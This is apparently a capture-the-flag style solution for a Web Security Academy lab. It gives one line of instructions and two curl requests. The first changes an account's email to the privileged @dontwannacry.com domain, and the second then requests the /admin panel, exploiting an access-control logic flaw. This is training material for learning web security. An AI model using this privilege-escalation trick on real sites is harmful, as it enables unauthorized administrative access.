
First make an account, after confirm your mail, change it to @dontwannacry.com

curl -i -s -k -X $'POST' \
    -H $'Host: 0ac10074039460968073e9ad00220039.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 67' -H $'Origin: https://0ac10074039460968073e9ad00220039.web-security-academy.net' -H $'Referer: https://0ac10074039460968073e9ad00220039.web-security-academy.net/my-account?id=amin' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' \
    -b $'session=3VItVwSZkvoESUuu2ZPSsz1e3plWz8UK' \
    --data-binary $'email=amin%40dontwannacry.com&csrf=tWFPpMNYzJmrl1WRmc635KhHNVHda1Cm' \
    $'https://0ac10074039460968073e9ad00220039.web-security-academy.net/my-account/change-email'



curl -i -s -k -X $'GET' \
    -H $'Host: 0ac10074039460968073e9ad00220039.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' \
    -b $'session=3VItVwSZkvoESUuu2ZPSsz1e3plWz8UK' \
    $'https://0ac10074039460968073e9ad00220039.web-security-academy.net/admin'